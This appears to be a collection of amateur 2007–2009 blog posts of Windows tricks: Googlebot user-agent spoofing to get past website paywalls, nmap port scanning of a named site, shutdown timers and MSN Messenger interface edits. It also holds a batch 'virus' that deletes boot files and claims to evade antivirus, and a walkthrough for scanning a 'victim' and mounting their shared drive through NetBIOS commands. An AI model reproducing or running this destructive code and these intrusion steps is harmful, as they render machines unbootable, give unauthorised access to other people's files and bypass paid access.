Sunday, March 22, 2009

Secret Entry To Many Websites Using Googlebot

You must have gone thourgh this many times when you ask Google to look something up; and the engine returns with a number of results, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.

This problem can be easily supassed by identifying urself as Google to the required website.

In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are .Net Magazine, Nature, and many, many newspapers around the globe.

How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

You may always change it back again.... I know only one site that uses you User Agent to establish your eligibility to use its services, and that's the Windows Update site..To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Finding Open Ports in a web server

Required Software- Nmap

Step 1: Download Nmap tool from the site www.insecure.org/nmap

Step 2: Install it in ur system.

Step 3: Go to command promt and just go to the path of the drive in which nmap is installed.

E.g:- c:\nmap>

Step 4: Now this is the command to type.

For example if u want to know about the open ports of Yahoo server.

c:\nmap> nmap -sT -p 40-225 www.yahoo.com

From the above command 40-225 are the port numbers of the server that are being checked.You can give any number of port numbers that you want , just try this one and see.
netstat -n
try this command..this will giv u all the ips along port..o r connected..
or u may try netstat -a

Wednesday, February 6, 2008

Make Your Own Auto-Shutdown Timer!!!

There are basically three ways to make an auto-shutdown timer. These are all DoS tricks. U may be knowing if u r good in DOS. Its very easy and does not any external software.

Method 1:-
This method is implemented by creating a batch file and providing the time in which the computer needs to be shutdown.

Create a file ""shutdown.bat"

Type the following code:

@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo PC Will Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit


METHOD 2:-

Here is another trick to shutdown at a specific time, for example you wish to shutdown at 10:45am.

Then Goto Start->Run
Type Code: at 10:45 shutdown -s

To Abort The Auto-Shutdown

Code: shutdown -a

take note: all time are in 24hr, example u would like to shutdown at 9:30pm, you should type
"at 21:30 shutdown -s" without quotes


METHOD 3:-

Step 1:
Right click on your desktop and choose "New->shortcuts".

Step 2:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t xxxx" without the quotation marks and click next.

Note: xxxx are the amount of seconds before your computer shuts down.
For example If u want to auto-shutdown after 1 hr then type "3600" without quotes because 60secs*60mins=3600secs.

Step 3:

Make up a name for the shortcut and you're done.
You can change the icon by right c=>properities=>change icon=>browse.

To abort

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.

Friday, January 18, 2008

Hacking MSN Messenger Through Resource Hacker- Part 1

It is a simple tutorial on how to use Resource Hacker to remove buttons/banners from MSN Messenger v7.0.0604 . You must 'Compile Script' after you edit something, if you forget, it will prompt you to do so the next time you search for text.

Note:- I have given "{}" at the end and beginning of CODES. U have to replace them with "<>" to make it run successfully.

First of all open Resource Hacker, then open msnmsgr.exe

Main Contact List Window

Removing the MSN Today Button
Find (Ctrl+F):
Result: UIFILE > 923 > 1033

Code:
{cmdbutton cmdid=40234 id=atom(msntodaybtn) class="ToolbarBtn" layout=flowlayout(0,2,0,2) AccName=rcstr(4231) AccRole=57 AccDesc=rcstr(4230) ShortcutString=rcstr(4229)}

Delete id=atom(msntodaybtn)
Change layout=flowlayout(0,2,0,2) to layoutpos=none

Final result should look like this:
Code: {cmdbutton cmdid=40234 class="ToolbarBtn" layoutpos=none AccName=rcstr(4231) AccRole=57 AccDesc=rcstr(4230) ShortcutString=rcstr(4229)}

Removing the My Space Button
Find (Ctrl+F):

Result: UIFILE > 923 > 1033
Code:
{cmdbutton cmdid=40421 id=atom(spacebtn) class="ToolbarBtn" layout=flowlayout(0,2,0,2) AccName=rcstr(4257) AccRole=57 AccDesc=rcstr(61769) ShortcutString=rcstr(4256)}

Delete id=atom(spacebtn)
Change layout=flowlayout(0,2,0,2) to layoutpos=none

Final result should look like this:
Code: {cmdbutton cmdid=40421 class="ToolbarBtn" layoutpos=none AccName=rcstr(4257) AccRole=57 AccDesc=rcstr(61769) ShortcutString=rcstr(4256)}

Removing the Add Contact Button
Find (Ctrl+F):
Result: UIFILE > 923 > 1033

Code:
{cmdbutton id=atom(idAddContact) cmdid=40282 class="TasklistBtn" layout=flowlayout(0,2,0,2) background=ifhc(window, gradient(rgb(222,229,247), rgb(242,242,250), 1)) bordercolor=ifhc(buttonshadow, rgb(214,220,242)) borderthickness=rect(1,1,1,1) padding=rect(3,2,3,2)}

Delete id=atom(idAddContact)
Change layout=flowlayout(0,2,0,2) to layoutpos=none

Final result should look like this:
Code: {cmdbutton cmdid=40282 class="TasklistBtn" layoutpos=none background=ifhc(window, gradient(rgb(222,229,247), rgb(242,242,250), 1)) bordercolor=ifhc(buttonshadow, rgb(214,220,242)) borderthickness=rect(1,1,1,1) padding=rect(3,2,3,2)}

Removing the Search Bar
Find (Ctrl+F):
Result: UIFILE > 923 > 1033

Code:
{element id=atom(idSearchContainer) layout=borderlayout() padding=rect(1,4,1,3)}

Change layout=borderlayout() to layoutpos=none
Change padding=rect(1,4,1,3) to padding=rect(0,0,0,0)

Final result should look like this:
Code:{element id=atom(idSearchContainer) layoutpos=none padding=rect(0,0,0,0)}


Removing the Ad Banner
Find (Ctrl+F):
Result: UIFILE > 923 > 1033

Code:
{element layoutpos=top layout=verticalflowlayout(0,2,2,2) padding=rect(2,0,3,2)}

Change layoutpos=top to layoutpos=none

Final result should look like this:
Code:{element layoutpos=none layout=verticalflowlayout(0,2,2,2) padding=rect(2,0,3,2)}



myLot User Profile

Wednesday, December 19, 2007

Cool Virus To Crash Your Own PC

A game with urself using dos commands. Play this game at your own risk.

Open Notepad-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOUR COMP IS CRASHING
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file

This will shut down the computer never to reboot again!

Type this in notepad and save as with this name .bat
The antivirus will not detect this virus as it is only a code.

Basically this program will delete all that files which are needed for booting
If your operating system is installed in d drive instead of c then replace c with d.

Hacking Using DOS

Step 1
Get an ip scanner like ANGRY IP SCANNER
Scan the Victims ip. Otherwise Get him using netstat command.

Step2
Open a dos prompt by going to start/run
type "cmd" in the run box.Press OK.

this is what u will see:
C:\Documents and Settings\>

c:windows>nbtstat -a 255.255.255.255

U will see:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.


Step 3

type :
c:windows>net view 255.255.255.255
The Output will be:

Shared resources at 255.255.255.255


Sharename Type Used as Comment

CDISK Disk xxxxx xxxxx

The work is done.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
replace x: by anything letter you want but not your own drive letters.(Not compulsory)
CDISK is the name of the shared hard-drive.

c:windows>net use x: 255.255.255.255CDISK

If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:> .
Now your are in his system.
Check out guyz....